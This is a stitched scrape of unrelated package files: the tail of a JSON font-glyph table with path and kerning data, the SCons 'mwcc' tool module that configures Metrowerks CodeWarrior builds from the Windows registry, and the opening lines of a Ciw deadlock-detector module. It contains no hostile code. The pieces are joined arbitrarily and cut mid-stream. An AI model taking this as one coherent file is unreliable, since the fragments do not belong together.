-73,"p":-46,"o":-27,"n":-49,"m":-129,"l":-67,"k":-97,"j":74,"i":-47,"h":-65,"f":-71,"e":-32,"d":42,"c":-30,"b":-94,"a":24,"`":477,"@":-31,";":206,":":116,"9":-63,"8":-112,"7":95,"6":-61,"5":-72,"4":-56,"2":-74,"1":49,"0":-114,"\/":105,".":230,"-":-71,",":297,")":230,"(":-53,"&":57,"%":101,"$":-94,"!":24}},"x":{"d":"581,-864v23,0,44,33,44,56v0,15,-51,80,-154,195v-103,115,-154,181,-154,197v0,16,44,66,133,150v89,84,144,129,163,135v5,0,47,19,61,19v19,0,41,-11,65,-33v25,-3,37,6,37,27v0,17,-19,35,-56,52v-31,15,-52,22,-63,22v-87,0,-216,-99,-388,-298v-59,51,-224,324,-221,417v0,14,6,35,17,63r-39,14v-16,-11,-55,-85,-55,-111v0,-61,39,-151,117,-270v78,-119,117,-176,117,-169v0,-1,-38,-48,-115,-142v-77,-94,-116,-156,-116,-186v-1,-17,19,-46,36,-46v20,0,66,50,137,148v71,98,110,147,116,147v1,0,48,-64,141,-193v93,-129,152,-194,177,-194","w":791,"k":{"\u00d0":277,"\u00c1":72,"\u00c0":310,"\u00d1":253,"~":133,"z":-61,"y":-69,"x":-63,"w":-75,"v":54,"u":-106,"t":84,"s":-55,"r":-87,"q":-107,"p":-78,"o":-87,"n":-105,"m":-156,"l":-72,"k":-102,"j":97,"i":-65,"h":-96,"g":-73,"f":36,"e":-105,"d":-56,"c":-98,"b":-121,"a":-78,"`":239,"@":63,"?":55,";":162,":":133,"9":104,"6":-90,"4":100,"3":-113,"2":-53,"1":26,"0":-97,".":57,"-":296,",":143,")":121,"(":-55,"#":84,"!":93}},"y":{"d":"140,642v-97,0,-183,-41,-260,-123v-67,-71,-101,-135,-101,-193v0,-28,11,-42,34,-42v27,-1,33,50,41,75v34,102,127,191,244,201v142,12,256,-66,337,-235v128,-268,120,-528,51,-876v-57,146,-104,254,-141,325v-76,143,-149,229,-222,250v-87,26,-132,-27,-132,-142v0,-91,24,-218,71,-383v50,-173,94,-262,131,-265v25,-3,77,30,61,56v-79,129,-181,397,-181,584v0,57,8,85,25,85v21,0,54,-35,101,-106v23,-34,43,-73,68,-114v92,-150,150,-271,165,-368v5,-35,6,-65,3,-92v-5,-45,11,-68,49,-68v39,0,60,47,66,114v14,149,34,241,55,276v11,19,17,111,17,276v0,151,-33,302,-99,453v-91,208,-218,312,-383,312","w":707,"k":{"\u00d0":-67,"\u00c1":39,"\u00c0":46,"\u00a2":-91,"\u00d1":-90,"\u00c9":-34,"~":92,"z":-92,"y":-162,"x":-86,"w":-66,"v":-73,"u":-103,"t":-42,"s":-87,"r":-83,"q":-83,"p":-71,"o":-82,"n":-112,"m":-155,"l":-71,"k":-103,"j":-390,"i":-65,"h":-91,"g":-63,"f":-96,"e":-99,"d":-74,"c":-93,"b":-117,"a":-
90,"`":496,"?":22,";":49,":":55,"9":-55,"8":-82,"6":-88,"5":-89,"4":-93,"3":-118,"2":-113,"1":-74,"0":-119,"\/":-86,".":39,"-":-44,",":25,"(":-59,"%":-89,"$":-52,"!":27}},"z":{"d":"511,-95v99,-2,228,49,223,137v0,5,-5,18,-15,38v-16,1,-47,-17,-46,-30v1,-48,-42,-72,-131,-72v-67,0,-212,37,-436,112v-44,15,-70,22,-78,22v-35,0,-47,-22,-43,-61v-25,-15,-38,-28,-38,-41v0,-38,34,-88,103,-149v103,-91,216,-182,340,-273v129,-95,197,-146,204,-152r10,-9v-106,-11,-404,46,-503,73v-39,11,-75,-11,-72,-47v-6,-29,63,-62,90,-62v41,0,184,-35,432,-35v91,0,136,23,136,69v0,23,-27,62,-89,109r-124,95r-286,215v-95,75,-147,128,-156,158v7,0,17,1,30,2v243,-66,392,-99,449,-99","w":786,"k":{"\u00d0":47,"\u00c1":46,"\u00c0":364,"\u00a2":-81,"\u00d1":21,"\u00c9":-53,"~":566,"z":-88,"y":-47,"x":-84,"w":-72,"v":-67,"u":-93,"t":79,"s":-61,"r":-85,"q":-101,"p":-77,"o":-60,"n":-109,"m":-144,"l":-30,"k":-69,"j":97,"i":-32,"h":-83,"g":-56,"f":51,"e":-81,"d":-88,"c":-66,"b":-77,"a":-93,"`":462,"@":31,"?":165,";":121,":":66,"8":-72,"6":-64,"5":-83,"4":49,"3":-93,"2":-113,"1":37,"0":-67,"\/":-75,"-":77,",":70,")":59,"&":62,"%":-75,"$":-24,"#":82,"!":66}},"{":{},"|":{},"}":{},"~":{"d":"415,-702v-66,0,-105,-70,-168,-73v-33,-2,-72,34,-93,58v-11,13,-23,18,-31,18v-14,0,-21,-8,-21,-23v-2,-7,60,-89,64,-93v22,-22,47,-42,85,-42v25,0,59,16,102,48v39,28,68,38,88,31v11,-1,69,-55,86,-55v18,0,30,25,17,42v-43,59,-85,89,-129,89","w":628,"k":{"\u00d0":488,"\u00c1":372,"\u00c2":294,"\u00c0":364,"\u00a2":-106,"\u00d1":443,"\u00c9":538,"~":57,"z":438,"y":113,"x":-36,"w":557,"v":429,"u":459,"t":130,"s":249,"r":213,"q":449,"p":88,"o":477,"n":444,"m":417,"l":-58,"k":-66,"j":62,"i":328,"h":-24,"g":446,"f":88,"e":458,"d":518,"c":462,"b":-30,"a":478,"`":236,"Z":492,"Y":176,"X":89,"W":-164,"V":-153,"U":145,"T":402,"S":-67,"R":135,"Q":-34,"P":43,"O":-34,"N":-168,"M":-183,"L":72,"K":-129,"J":138,"I":158,"H":77,"F":-117,"E":-141,"D":-172,"C":40,"B":-167,"A":434,"@":140,"?":-82,";":442,":":353,"9":-24,"8":-106,"7":478,"6":77,"5":31,"4":50,"3":443,"2":-150,"1":98,"0":-53,"\/":466,".":294,"-":511,",":363,")":262,"(":28,"&":139,"%":422,"$":-114,"#":-24,"!":35}},"\u00c4":{},"\u00c5":{},"\u00c7":{},"\u00c9":{"k":{"\u00d0":805,"\u00c0":287,"\u00a2":594,"\u00d1":965,"\u00c9":-41,"~":594,"z":-138,"y":-93,"x":-111,"w":-105,"v":73,"u":-122,"t":102,"s":-98,"r":-99,"q":-157,"p":-94,"o":-100,"n":-131,"m":-165,"l":-61,"k":-100,"j":91,"i":-66,"h":-103,"g":-115,"f":40,"e":-125,"d":-125,"c":-110,"b":-116,"a":-135,"`":491,"Z":-167,"X":-155,"W":193,"V":344,"U":-58,"T":290,"S":-45,"R":81,"Q":-104,"P":44,"O":-105,"N":113,"M":94,"K":-138,"J":211,"I":53,"G":-108,"D":39,"C":-132,"B":-112,"A":-90,"@":146,"?":864,";":105,":":34,"9":317,"8":-30,"7":-45,"6":-95,"5":-112,"4":454,"3":-230,"2":-161,"1":32,"0":-81,"\/":-95,".":32,"-":644,",":97,")":59,"(":-50,"%":-95,"$":537,"#":133,"!":335}},"\u00d1":{"k":{"\u00d0":-47,"\u00c1":1226,"\u00c2":66,"\u00c0":1017,"\u00a2":-53,"\u00d1":-71,"\u00c9":1051,"~":584,"z":270,"x":113,"w":-47,"v":-44,"u":-26,"t":-49,"s":-80,"r":-46,"q":53,"p":-25,"n":-31,"m":-111,"l":-45,"k":-78,"j":114,"i":-36,"h":-44,"g":44,"f":30,"d":110,"b":-78,"a":110,"`":481,"Z":226,"Y":93,"X":116,"W":240,"V":306,"U":63,"T":299,"R":119,"Q":-101,"P":59,"O":-100,"N":177,"M":168,"L":119,"K":-123,"J":312,"I":168,"H":-36,"G":-98,"F":-71,"E":-34,"D":48,"C":-92,"A":140,"?":215,";":245,":":139,"9":-67,"8":137,"7":147,"6":-44,"5":-107,"4":-53,"3":163,"2":348,"1":70,"0":-99,"\/":211,".":286,"-":-24,",":355,")":270,"(":-35,"&":137,"%":212,"$":-53,"#":58,"!":40}},"\u00d6":{},"\u00dc":{},"\u00e1":{"d"
:"707,-908v-33,15,-91,40,-174,71v-22,8,-49,2,-49,-22v0,-13,9,-23,26,-30v111,-48,192,-103,242,-166v35,-26,120,13,89,60v-16,25,-61,54,-134,87xm761,-85v0,81,-83,126,-163,96v-63,-23,-95,-97,-95,-222v0,-13,0,-27,1,-41v-66,88,-139,168,-218,241v-102,93,-182,140,-241,140v-57,0,-87,-44,-86,-104v0,-83,44,-196,134,-337v86,-136,181,-247,284,-334v112,-95,195,-125,249,-90v25,16,38,50,38,101v0,61,-21,94,-63,98v-29,2,-44,-8,-44,-31v10,-33,20,-66,20,-93v0,-15,-2,-22,-5,-21v-66,12,-172,114,-320,306v-148,192,-222,323,-222,396v0,25,11,38,34,38v58,0,149,-75,273,-225v86,-104,133,-162,141,-173v38,-53,60,-101,65,-145v3,-30,19,-45,48,-45v41,0,57,20,49,59v-33,171,-49,276,-49,313v0,68,15,105,45,114v18,5,49,-11,51,-24v7,-29,23,-43,50,-43v16,0,24,9,24,26","w":734},"\u00e0":{},"\u00e2":{},"\u00e4":{},"\u00e3":{},"\u00e5":{},"\u00e7":{},"\u00e9":{"d":"532,-847v-34,15,-92,40,-174,71v-22,8,-49,2,-49,-22v0,-13,8,-23,25,-30v112,-48,193,-103,243,-166v35,-26,120,12,88,60v-16,24,-60,54,-133,87xm198,-262v-43,0,-74,-10,-96,-29v-27,24,-59,179,-59,238v0,52,34,78,103,78v66,0,143,-38,232,-115v86,-75,146,-152,179,-231r32,0v13,12,17,23,13,34v-39,112,-104,205,-194,279v-86,71,-172,107,-259,107v-130,1,-195,-99,-187,-236v6,-100,59,-224,160,-372v109,-159,208,-238,297,-238v51,0,87,55,87,107v0,65,-28,140,-83,225v-66,102,-140,153,-225,153xm407,-677v-25,6,-48,21,-69,46v-139,163,-208,257,-208,284v0,7,15,12,46,14v52,3,109,-35,170,-112v60,-75,90,-143,90,-202v0,-25,-10,-35,-29,-30","w":626},"\u00e8":{},"\u00ea":{},"\u00eb":{},"\u00ed":{"d":"329,-826v-33,15,-91,40,-174,71v-22,8,-49,2,-49,-22v0,-13,9,-23,26,-30v111,-48,192,-103,242,-166v35,-26,120,13,89,60v-16,25,-61,54,-134,87xm269,55v0,31,-55,65,-86,64v-63,0,-112,-49,-145,-148v-49,-145,-42,-247,-13,-418v21,-126,52,-188,90,-188v30,0,45,17,45,52v0,16,-10,46,-28,90v-20,48,-42,129,-42,245v0,55,1,87,0,98r26,124v17,55,43,82,77,82v8,0,13,-1,16,-4v9,-13,22,-23,39,-31v14,12,21,23,21,34","w":315},"\u00ec":{},"\u00ee":{},"\u00ef":{},"\u00f1":{"d":"415,-702v-66,0,-105,-70,-168,-73v-33,-2,-72,34,-93,58v-11,13,-23,18,-31,18v-14,0,-21,-8,-21,-23v-2,-7,60,-89,64,-93v22,-22,47,-42,85,-42v25,0,59,16,102,48v39,28,68,38,88,31v11,-1,69,-55,86,-55v18,0,30,25,17,42v-43,59,-85,89,-129,89xm81,-238r17,-30v143,-243,245,-364,305,-364v57,0,105,40,113,125r18,190v11,104,17,163,20,177v15,93,38,140,67,140v13,0,30,-12,52,-35r37,12v7,42,-46,82,-84,83v-96,0,-156,-108,-178,-325v-5,-51,-10,-122,-21,-211v-7,-55,-17,-82,-28,-82v-23,0,-78,70,-167,210v-89,140,-152,270,-189,389v-9,32,-26,48,-49,48v-30,0,-44,-15,-41,-45v1,-11,25,-152,64,-424v5,-34,5,-81,10,-141v5,-55,25,-82,60,-82v20,0,34,7,41,22r12,45","w":716},"\u00f3":{"d":"523,-850v-33,15,-92,38,-174,70v-21,8,-48,2,-48,-21v0,-13,8,-23,25,-30v112,-49,189,-108,242,-166v29,-32,119,12,89,59v-16,25,-60,55,-134,88xm258,-584v-12,-7,-29,-15,-29,-33v0,-23,24,-46,72,-69v40,-19,70,-29,89,-29v108,0,164,83,168,250v2,81,-34,187,-107,319v-85,154,-178,235,-279,244v-115,11,-187,-93,-187,-210v0,-103,24,-214,73,-334v49,-120,95,-179,138,-179v39,0,58,16,58,49v0,9,-11,29,-33,58v-105,139,-158,268,-158,389v0,104,26,156,78,156v79,0,155,-72,231,-215v66,-124,99,-224,99,-299v0,-109,-27,-163,-81,-163v-41,0,-85,22,-132,66","w":628},"\u00f2":{},"\u00f4":{},"\u00f6":{},"\u00f5":{"d":"480,-751v-68,0,-103,-69,-167,-73v-32,-2,-72,35,-93,58v-12,13,-23,19,-32,19v-14,0,-21,-8,-21,-24v-2,-6,59,-89,64,-92v22,-24,46,-43,85,-43v25,0,60,16,103,48v39,29,68,39,87,31v11,0,69,-54,86,-54v18,0,30,25,17,42v-43,58,-85,88,-129,88xm258,-584v-12,-7,-29,-15,-29,-33v0,-23,24,-46,72,-69v40,-19,70,-29,89,-29v108,0,164,83,168,250v2,81,-34,187,-1
07,319v-85,154,-178,235,-279,244v-115,11,-187,-93,-187,-210v0,-103,24,-214,73,-334v49,-120,95,-179,138,-179v39,0,58,16,58,49v0,9,-11,29,-33,58v-105,139,-158,268,-158,389v0,104,26,156,78,156v79,0,155,-72,231,-215v66,-124,99,-224,99,-299v0,-109,-27,-163,-81,-163v-41,0,-85,22,-132,66","w":628},"\u00fa":{"d":"523,-850v-33,15,-92,38,-174,70v-21,8,-48,2,-48,-21v0,-13,8,-23,25,-30v112,-49,189,-108,242,-166v29,-32,119,12,89,59v-16,25,-60,55,-134,88xm617,-50v31,0,55,-37,85,-54v15,13,22,23,22,31v0,24,-16,45,-49,64v-27,15,-48,23,-65,23v-104,0,-165,-114,-182,-341r-1,-18v-71,149,-118,241,-139,274v-71,110,-147,165,-226,165v-63,0,-94,-63,-94,-188v0,-36,19,-133,57,-291v44,-180,81,-271,111,-272v25,-1,65,20,63,44v-2,21,-18,50,-25,71v-85,228,-127,388,-127,480v0,56,10,84,29,84v24,0,61,-31,112,-93v55,-67,109,-153,162,-258v60,-117,90,-207,91,-268v0,-38,28,-87,64,-86v33,0,50,17,50,50v0,5,-5,38,-17,98v-12,60,-18,117,-18,171v0,209,32,314,97,314","w":691},"\u00f9":{},"\u00fb":{},"\u00fc":{},"\u00b0":{},"\u00a2":{"d":"177,-394v-151,29,-243,-80,-243,-226v0,-73,30,-166,89,-281v65,-127,140,-218,223,-273v15,-63,33,-117,50,-162v14,-39,99,-21,80,24v-12,28,-23,60,-34,96v55,-10,74,-5,131,20v49,21,72,47,76,77v3,22,-25,45,-46,45v-15,0,-34,-12,-57,-36v-38,-42,-74,-44,-126,-22v-50,202,-78,413,-85,633v101,-37,186,-110,256,-219v12,-17,29,-10,40,6v7,10,10,19,8,26v-6,21,-43,67,-113,134v-111,106,-88,92,-192,146v1,67,5,124,12,169v4,25,-3,37,-22,37v-17,0,-27,-11,-31,-34v-7,-45,-13,-98,-16,-160xm14,-606v0,85,35,127,106,127v19,0,38,-1,55,-4v-1,-195,14,-385,47,-572v-55,61,-105,143,-149,246v-39,91,-59,159,-59,203","w":683,"k":{"\u00d0":212,"\u00c1":481,"\u00c2":187,"\u00c0":667,"\u00a2":-24,"\u00d1":186,"\u00c9":761,"~":124,"z":152,"y":114,"w":149,"v":20,"u":119,"t":199,"s":159,"q":259,"p":60,"o":185,"n":117,"l":26,"j":272,"i":123,"h":50,"g":269,"f":160,"e":225,"d":360,"c":214,"b":34,"a":308,"`":325,"Z":340,"Y":83,"W":-22,"V":204,"U":157,"T":177,"R":159,"Q":30,"P":124,"O":32,"N":-27,"M":193,"L":171,"K":-46,"J":69,"I":44,"H":113,"G":42,"F":110,"E":143,"D":123,"C":75,"B":-71,"A":270,"@":130,"?":240,";":417,":":343,"9":32,"8":-25,"7":223,"6":112,"5":111,"4":102,"3":380,"2":210,"1":164,"\/":430,".":350,"-":242,",":419,")":177,"(":81,"&":229,"%":369,"$":102,"#":252,"!":118}},"\u00a3":{},"\u00a7":{},"\u00b6":{},"\u00df":{},"\u00ae":{},"\u00a9":{},"\u00b4":{},"\u00a8":{},"\u00c6":{},"\u00d8":{},"\u00b1":{},"\u00a5":{},"\u00b5":{},"\u00aa":{},"\u00ba":{},"\u00e6":{},"\u00f8":{"w":554},"\u00bf":{"d":"367,-347v0,-22,49,-50,70,-50v41,0,61,15,61,46v0,37,-21,56,-64,56v-45,0,-67,-17,-67,-52xm410,-131v63,0,112,58,111,118v0,55,-46,128,-148,207r-275,212v-99,81,-148,145,-148,194v0,89,68,134,204,134v72,0,154,-22,246,-67v61,-30,130,-72,207,-125v64,-45,98,-67,101,-67v29,0,44,16,44,49v0,34,-56,83,-169,147v-95,55,-167,89,-215,102v-73,20,-145,30,-217,30v-185,0,-278,-69,-278,-207v0,-71,44,-158,149,-237r276,-207v99,-74,149,-132,149,-173v0,-22,-10,-34,-31,-37v-36,-5,-54,-16,-54,-33v0,-27,16,-40,48,-40","w":741},"\u00a1":{"d":"197,-357v0,-22,49,-50,70,-50v41,0,61,15,61,46v0,37,-21,56,-64,56v-45,0,-67,-17,-67,-52xm267,758v11,31,-23,60,-49,61v-37,0,-70,-84,-98,-253v-28,-173,-44,-319,-35,-482v5,-93,76,-234,146,-259v19,-7,45,-13,48,8v1,10,-2,22,-15,32v-57,43,-87,135,-87,282v0,243,33,446,90,611","w":418},"\u00ac":{"d":"185,-351v-37,155,-51,236,-31,373v5,27,23,53,55,78v23,17,14,43,-13,52v-17,7,-33,4,-48,-7v-51,-38,-76,-116,-76,-233v0,-206,52,-323,96,-553v4,-22,18,-33,43,-33v31,0,44,13,39,40v-6,36,-29,130,-65,283","w":372},"\u00ab":{},"\u00bb":{},"\u00a0":{},"\u00c0":{"k":{
"\u00d0":77,"\u00c2":164,"\u00c0":-160,"\u00a2":310,"\u00d1":34,"\u00c9":99,"~":503,"z":66,"y":-200,"x":74,"w":78,"v":166,"u":63,"t":143,"s":98,"r":81,"q":76,"p":-77,"o":85,"n":51,"l":116,"k":84,"j":-502,"i":116,"h":75,"g":-94,"f":88,"e":61,"d":60,"c":75,"b":64,"a":52,"`":399,"Z":36,"Y":-90,"X":27,"W":366,"V":485,"U":123,"T":461,"S":181,"R":261,"Q":66,"P":222,"O":60,"N":292,"M":284,"L":74,"K":38,"J":-276,"I":123,"H":60,"G":84,"F":74,"E":146,"D":210,"C":52,"B":70,"A":67,"@":176,"?":334,";":260,":":230,"9":140,"8":165,"7":135,"6":85,"5":95,"4":143,"3":29,"2":21,"1":123,"0":68,"\/":70,".":172,"-":94,",":185,")":210,"(":125,"&":187,"%":70,"$":221,"#":332,"!":213}},"\u00c3":{},"\u00d5":{},"\u00f7":{},"\u00ff":{},"\u00a4":{},"\u00c2":{"k":{"\u00c1":89,"\u00c2":96,"\u00c0":246,"\u00a2":-83,"\u00d1":-26,"\u00c9":101,"~":366,"y":92,"x":-22,"v":-65,"t":23,"r":-48,"o":36,"n":-26,"m":-74,"l":-25,"k":-42,"j":-122,"g":51,"c":27,"b":-33,"`":350,"Z":-30,"Y":222,"X":-51,"W":-101,"V":243,"U":43,"T":228,"S":-51,"R":190,"Q":-47,"P":193,"O":-51,"N":209,"M":198,"L":-56,"K":-100,"J":-42,"H":-80,"G":-48,"F":-26,"E":201,"D":182,"C":-39,"B":157,"A":-54,"@":38,"?":276,";":99,":":176,"8":-81,"7":43,"5":-25,"2":-57,"1":-31,"0":-59,"\/":-50,".":173,"-":22,",":77,")":60,"&":120,"%":-50,"#":58,"!":68}},"\u00ca":{},"\u00c1":{"k":{"\u00d0":-78,"\u00c1":125,"\u00c2":37,"\u00c0":-45,"\u00a2":264,"\u00d1":-122,"\u00c9":79,"~":402,"y":-107,"w":-67,"u":-58,"t":-29,"s":-72,"r":-58,"q":-21,"p":-43,"o":-45,"n":-59,"m":-129,"l":-51,"k":-82,"j":-366,"i":-49,"h":-63,"f":-80,"e":-56,"c":-47,"b":-91,"a":-27,"`":385,"Y":46,"X":-31,"W":221,"V":281,"U":25,"T":263,"S":88,"R":222,"Q":-100,"P":227,"O":-107,"N":239,"M":233,"K":-130,"J":-285,"I":69,"H":-46,"G":-79,"F":-91,"E":-22,"D":42,"C":-110,"A":-68,"?":306,";":163,":":178,"9":-25,"8":241,"7":56,"6":-65,"5":-47,"3":-42,"2":-20,"1":36,"0":-98,".":152,"-":-61,",":150,")":111,"(":-40,"&":51,"$":29,"#":342,"!":44}},"\u00cb":{},"\u00c8":{},"\u00cd":{},"\u00ce":{},"\u00cf":{},"\u00cc":{},"\u00d3":{},"\u00d4":{},"\u00d2":{},"\u00da":{},"\u00db":{},"\u00d9":{},"\u00af":{},"\u00b8":{},"\u00a6":{},"\u00d0":{"k":{"\u00d0":-103,"\u00c1":107,"\u00c0":284,"\u00a2":-104,"\u00d1":-147,"\u00c9":838,"~":577,"z":255,"y":-74,"x":61,"w":-103,"v":-97,"u":-83,"t":-109,"s":-138,"r":-102,"p":-81,"o":-64,"n":-87,"m":-167,"l":-101,"k":-135,"j":60,"i":-92,"h":-100,"f":-67,"e":-49,"d":47,"c":-52,"b":-135,"a":46,"`":474,"Z":151,"Y":36,"X":54,"W":184,"V":251,"T":243,"S":-71,"R":62,"Q":-157,"O":-157,"N":121,"M":112,"L":63,"K":-179,"J":366,"I":112,"H":-97,"G":-155,"F":-135,"E":-94,"C":-149,"B":-41,"A":50,"@":-72,"?":144,";":192,":":85,"9":-122,"8":85,"7":89,"6":-101,"5":-165,"4":-110,"3":97,"2":269,"0":-155,"\/":148,".":279,"-":-79,",":348,")":214,"(":-92,"&":66,"%":148,"$":-107}},"\u00f0":{},"\u00dd":{},"\u00fd":{},"\u00de":{},"\u00fe":{},"\u00ad":{},"\u00d7":{},"\u00b9":{},"\u00b2":{},"\u00b3":{},"\u00bd":{},"\u00bc":{},"\u00be":{}}}); | PypiClean |
/Nuitka-1.8.tar.gz/Nuitka-1.8/nuitka/build/inline_copy/lib/scons-2.3.2/SCons/Tool/mwcc.py |
__revision__ = "src/engine/SCons/Tool/mwcc.py 2014/07/05 09:42:21 garyo"
import os
import os.path
import SCons.Util
def set_vars(env):
"""Set MWCW_VERSION, MWCW_VERSIONS, and some codewarrior environment vars
MWCW_VERSIONS is set to a list of objects representing installed versions
MWCW_VERSION is set to the version object that will be used for building.
MWCW_VERSION can be set to a string during Environment
construction to influence which version is chosen, otherwise
the latest one from MWCW_VERSIONS is used.
Returns true if at least one version is found, false otherwise
"""
desired = env.get('MWCW_VERSION', '')
# return right away if the variables are already set
if isinstance(desired, MWVersion):
return 1
elif desired is None:
return 0
versions = find_versions()
version = None
if desired:
for v in versions:
if str(v) == desired:
version = v
elif versions:
version = versions[-1]
env['MWCW_VERSIONS'] = versions
env['MWCW_VERSION'] = version
if version is None:
return 0
env.PrependENVPath('PATH', version.clpath)
env.PrependENVPath('PATH', version.dllpath)
ENV = env['ENV']
ENV['CWFolder'] = version.path
ENV['LM_LICENSE_FILE'] = version.license
plus = lambda x: '+%s' % x
ENV['MWCIncludes'] = os.pathsep.join(map(plus, version.includes))
ENV['MWLibraries'] = os.pathsep.join(map(plus, version.libs))
return 1
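# A minimal usage sketch (not part of the original tool; the version string
# '9.4' is a made-up example): a build script can pin a CodeWarrior install
# before this tool initialises, and set_vars() resolves it against the
# installed versions found in the registry:
#
#     env = Environment(MWCW_VERSION='9.4', tools=['mwcc'])
#     if env['MWCW_VERSION'] is None:
#         print 'no matching CodeWarrior installation found'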
def find_versions():
"""Return a list of MWVersion objects representing installed versions"""
versions = []
### This function finds CodeWarrior by reading from the registry on
### Windows. Some other method needs to be implemented for other
### platforms, maybe something that calls env.WhereIs('mwcc')
if SCons.Util.can_read_reg:
try:
HLM = SCons.Util.HKEY_LOCAL_MACHINE
product = 'SOFTWARE\\Metrowerks\\CodeWarrior\\Product Versions'
product_key = SCons.Util.RegOpenKeyEx(HLM, product)
i = 0
while True:
name = product + '\\' + SCons.Util.RegEnumKey(product_key, i)
name_key = SCons.Util.RegOpenKeyEx(HLM, name)
try:
version = SCons.Util.RegQueryValueEx(name_key, 'VERSION')
path = SCons.Util.RegQueryValueEx(name_key, 'PATH')
mwv = MWVersion(version[0], path[0], 'Win32-X86')
versions.append(mwv)
except SCons.Util.RegError:
pass
i = i + 1
except SCons.Util.RegError:
pass
return versions
class MWVersion(object):
def __init__(self, version, path, platform):
self.version = version
self.path = path
self.platform = platform
self.clpath = os.path.join(path, 'Other Metrowerks Tools',
'Command Line Tools')
self.dllpath = os.path.join(path, 'Bin')
# The Metrowerks tools don't store any configuration data so they
# are totally dumb when it comes to locating standard headers,
# libraries, and other files, expecting all the information
# to be handed to them in environment variables. The members set
# below control what information scons injects into the environment
### The paths below give a normal build environment in CodeWarrior for
### Windows, other versions of CodeWarrior might need different paths.
msl = os.path.join(path, 'MSL')
support = os.path.join(path, '%s Support' % platform)
self.license = os.path.join(path, 'license.dat')
self.includes = [msl, support]
self.libs = [msl, support]
def __str__(self):
return self.version
CSuffixes = ['.c', '.C']
CXXSuffixes = ['.cc', '.cpp', '.cxx', '.c++', '.C++']
def generate(env):
"""Add Builders and construction variables for the mwcc to an Environment."""
import SCons.Defaults
import SCons.Tool
set_vars(env)
static_obj, shared_obj = SCons.Tool.createObjBuilders(env)
for suffix in CSuffixes:
static_obj.add_action(suffix, SCons.Defaults.CAction)
shared_obj.add_action(suffix, SCons.Defaults.ShCAction)
for suffix in CXXSuffixes:
static_obj.add_action(suffix, SCons.Defaults.CXXAction)
shared_obj.add_action(suffix, SCons.Defaults.ShCXXAction)
env['CCCOMFLAGS'] = '$CPPFLAGS $_CPPDEFFLAGS $_CPPINCFLAGS -nolink -o $TARGET $SOURCES'
env['CC'] = 'mwcc'
env['CCCOM'] = '$CC $CFLAGS $CCFLAGS $CCCOMFLAGS'
env['CXX'] = 'mwcc'
env['CXXCOM'] = '$CXX $CXXFLAGS $CCCOMFLAGS'
env['SHCC'] = '$CC'
env['SHCCFLAGS'] = '$CCFLAGS'
env['SHCFLAGS'] = '$CFLAGS'
env['SHCCCOM'] = '$SHCC $SHCFLAGS $SHCCFLAGS $CCCOMFLAGS'
env['SHCXX'] = '$CXX'
env['SHCXXFLAGS'] = '$CXXFLAGS'
env['SHCXXCOM'] = '$SHCXX $SHCXXFLAGS $CCCOMFLAGS'
env['CFILESUFFIX'] = '.c'
env['CXXFILESUFFIX'] = '.cpp'
env['CPPDEFPREFIX'] = '-D'
env['CPPDEFSUFFIX'] = ''
env['INCPREFIX'] = '-I'
env['INCSUFFIX'] = ''
#env['PCH'] = ?
#env['PCHSTOP'] = ?
def exists(env):
return set_vars(env)
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4: | PypiClean |
/FreePyBX-1.0-RC1.tar.gz/FreePyBX-1.0-RC1/freepybx/public/js/dijit/form/CurrencyTextBox.js.uncompressed.js | define("dijit/form/CurrencyTextBox", [
"dojo/currency", // currency._mixInDefaults currency.format currency.parse currency.regexp
"dojo/_base/declare", // declare
"dojo/_base/lang", // lang.hitch
"./NumberTextBox"
], function(currency, declare, lang, NumberTextBox){
/*=====
var NumberTextBox = dijit.form.NumberTextBox;
=====*/
// module:
// dijit/form/CurrencyTextBox
// summary:
// A validating currency textbox
/*=====
declare(
"dijit.form.CurrencyTextBox.__Constraints",
[dijit.form.NumberTextBox.__Constraints, currency.__FormatOptions, currency.__ParseOptions], {
// summary:
// Specifies both the rules on valid/invalid values (minimum, maximum,
// number of required decimal places), and also formatting options for
// displaying the value when the field is not focused (currency symbol,
// etc.)
// description:
// Follows the pattern of `dijit.form.NumberTextBox.constraints`.
// In general developers won't need to set this parameter
// example:
// To ensure that the user types in the cents (for example, 1.00 instead of just 1):
// | {fractional:true}
});
=====*/
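	/*
	Usage sketch (illustrative, not from this file): declaratively,
		<input data-dojo-type="dijit/form/CurrencyTextBox"
			data-dojo-props="currency:'USD', constraints:{fractional:true}">
	or programmatically,
		new CurrencyTextBox({currency: "EUR"}, "myNode");
	where "myNode" is a hypothetical DOM node id.
	*/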
return declare("dijit.form.CurrencyTextBox", NumberTextBox, {
// summary:
// A validating currency textbox
// description:
// CurrencyTextBox is similar to `dijit.form.NumberTextBox` but has a few
// extra features related to currency:
//
// 1. After specifying the currency type (american dollars, euros, etc.) it automatically
// sets parse/format options such as how many decimal places to show.
// 2. The currency mark (dollar sign, euro mark, etc.) is displayed when the field is blurred
// but erased during editing, so that the user can just enter a plain number.
// currency: [const] String
// the [ISO4217](http://en.wikipedia.org/wiki/ISO_4217) currency code, a three letter sequence like "USD"
currency: "",
/*=====
// constraints: dijit.form.CurrencyTextBox.__Constraints
// Despite the name, this parameter specifies both constraints on the input
// (including minimum/maximum allowed values) as well as
// formatting options. See `dijit.form.CurrencyTextBox.__Constraints` for details.
constraints: {},
======*/
baseClass: "dijitTextBox dijitCurrencyTextBox",
// Override regExpGen ValidationTextBox.regExpGen().... we use a reg-ex generating function rather
// than a straight regexp to deal with locale (plus formatting options too?)
regExpGen: function(constraints){
// if focused, accept either currency data or NumberTextBox format
return '(' + (this.focused ? this.inherited(arguments, [ lang.mixin({}, constraints, this.editOptions) ]) + '|' : '')
+ currency.regexp(constraints) + ')';
},
// Override NumberTextBox._formatter to deal with currencies, ex: converts "123.45" to "$123.45"
_formatter: currency.format,
_parser: currency.parse,
parse: function(/*String*/ value, /*Object*/ constraints){
// summary:
// Parses string value as a Currency, according to the constraints object
// tags:
// protected extension
var v = this.inherited(arguments);
if(isNaN(v) && /\d+/.test(value)){ // currency parse failed, but it could be because they are using NumberTextBox format so try its parse
v = lang.hitch(lang.mixin({}, this, { _parser: NumberTextBox.prototype._parser }), "inherited")(arguments);
}
return v;
},
_setConstraintsAttr: function(/*Object*/ constraints){
if(!constraints.currency && this.currency){
constraints.currency = this.currency;
}
this.inherited(arguments, [ currency._mixInDefaults(lang.mixin(constraints, { exponent: false })) ]); // get places
}
});
}); | PypiClean |
/Ciw-3.0.0.tar.gz/Ciw-3.0.0/ciw/deadlock/deadlock_detector.py | import networkx as nx
class NoDetection(object):
"""
A generic class for all deadlock detector classes to inherit from.
